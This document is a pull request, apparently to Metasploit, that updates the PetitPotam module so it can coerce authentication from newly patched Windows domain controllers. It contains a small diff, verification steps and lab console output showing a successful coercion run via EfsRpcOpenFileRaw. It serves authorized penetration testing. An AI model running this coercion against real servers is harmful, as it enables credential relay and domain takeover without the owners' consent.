### PR TITLE
Update PetitPotam For New Windows Servers

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -473,7 +473,7 @@ GEM
     ruby-progressbar (1.13.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.3.0)
+    ruby_smb (3.3.1)
       bindata
       openssl-ccm
       openssl-cmac

--- a/modules/auxiliary/scanner/dcerpc/petitpotam.rb
+++ b/modules/auxiliary/scanner/dcerpc/petitpotam.rb
@@ -7,7 +7,7 @@ require 'windows_error'
 require 'ruby_smb'
 require 'ruby_smb/error'
 require 'ruby_smb/dcerpc/lsarpc'
-require 'ruby_smb/dcerpc/encrypting_file_system'
+require 'ruby_smb/dcerpc/efsrpc'
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::DCERPC
@@ -15,19 +15,16 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
 
-  EncryptingFileSystem = RubySMB::Dcerpc::EncryptingFileSystem
-
   METHODS = %w[EfsRpcOpenFileRaw EfsRpcEncryptFileSrv EfsRpcDecryptFileSrv EfsRpcQueryUsersOnFile EfsRpcQueryRecoveryAgents].freeze
-  ### UPDATE ME
   # The LSARPC UUID should be used for all pipe handles, except for the efsrpc one. For that one use
-  # EncryptingFileSystem and it's normal UUID
+  # Efsrpc and it's normal UUID
   PIPE_HANDLES = {
     lsarpc: {
       endpoint: RubySMB::Dcerpc::Lsarpc,
       filename: 'lsarpc'.freeze
     },
     efsrpc: {
-      endpoint: RubySMB::Dcerpc::EncryptingFileSystem,
+      endpoint: RubySMB::Dcerpc::Efsrpc,
       filename: 'efsrpc'.freeze
     },
     samr: {
@@ -154,7 +151,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def efs_call(name, **kwargs)
-    request = EncryptingFileSystem.const_get("#{name}Request").new(**kwargs)
+    request = RubySMB::Dcerpc::Efsrpc.const_get("#{name}Request").new(**kwargs)
 
     begin
       raw_response = @pipe.dcerpc_request(
@@ -167,7 +164,7 @@ class MetasploitModule < Msf::Auxiliary
       return nil
     end
 
-    EncryptingFileSystem.const_get("#{name}Response").read(raw_response)
+    RubySMB::Dcerpc::Efsrpc.const_get("#{name}Response").read(raw_response)
   end
 
   def service_data


### PR DESCRIPTION
This makes an update to the PetitPotam module to enable it to target patched Windows Servers when provided the necessary authentication information. At some point between Windows Server build `10.0.17763.107` and `10.0.17763.3232` a change was made which required not only the SMB connection to be authenticated but also the inner DCERPC connection. The inner DCERPC connection must use RPC_C_AUTHN_LEVEL_PKT_PRIVACY, and RPC_C_AUTHN_WINNT to target these newer servers. To accommodate this, the Petit Potam module was switched to using RubySMB's DCERPC connection for named pipes which supports this authentication.

There a no changes necessary from a user perspective, the module will simply work now when targeting these newer servers.

Requires changes from:

* rapid7/ruby_smb#259

## Verification

- [ ] Install a Windows Server Domain Controller with recent patches
- [ ] Create a user account, no special privileges should be necessary
- [ ] Start `msfconsole`
- [ ] Run the petitpotam module with the credentials from the previous step
- [ ] See that the module works, returning ERROR_BAD_NETPATH instead of ERROR_ACCESS_DENIED

## New and working

```
msf6 auxiliary(scanner/dcerpc/petitpotam) > show options 

Module options (auxiliary/scanner/dcerpc/petitpotam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CHOST                       no        The local client address
   CPORT                       no        The local client port
   LISTENER   192.168.159.11   yes       The host listening for the incoming connection
   METHOD     Automatic        yes       The RPC method to use for triggering (Accepted: Automatic, EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv, EfsRpcDecryptFileSrv, EfsRpcQueryUsersOnFile, EfsRpcQueryRecoveryAgents)
   PIPE       efsrpc           yes       The named pipe to use for triggering (Accepted: lsarpc, efsrpc, samr, lsass, netlogon)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.10   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  MSFLAB           no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    mhatter          no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/dcerpc/petitpotam) > run

[*] 192.168.159.10:445    - Binding to df1941c5-fe89-4e79-bf10-463657acf44d:1.0@ncacn_np:192.168.159.10[\efsrpc] ...
[*] 192.168.159.10:445    - Bound to df1941c5-fe89-4e79-bf10-463657acf44d:1.0@ncacn_np:192.168.159.10[\efsrpc] ...
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw
[+] 192.168.159.10:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >
```

## Old and broken

````````
msf6 auxiliary(scanner/dcerpc/petitpotam) > show options 

Module options (auxiliary/scanner/dcerpc/petitpotam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LISTENER   192.168.159.11   yes       The host listening for the incoming connection
   METHOD     Automatic        yes       The RPC method to use for triggering (Accepted: Automatic, EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv, EfsRpcDecryptFileSrv, EfsRpcQueryUsersOnFile, EfsRpcQueryRecoveryAgents)
   PIPE       efsrpc           yes       The named pipe to use for triggering (Accepted: lsarpc, efsrpc, samr, lsass, netlogon)
   RHOSTS     192.168.159.10   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  MSFLAB           no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    mhatter          no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/dcerpc/petitpotam) > run

[*] 192.168.159.10:445    - Binding to df1941c5-fe89-4e79-bf10-463657acf44d:1.0@ncacn_np:192.168.159.10[\efsrpc] ...
[*] 192.168.159.10:445    - Bound to df1941c5-fe89-4e79-bf10-463657acf44d:1.0@ncacn_np:192.168.159.10[\efsrpc] ...
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcEncryptFileSrv
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcDecryptFileSrv
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcQueryUsersOnFile
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcQueryRecoveryAgents
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) > 
```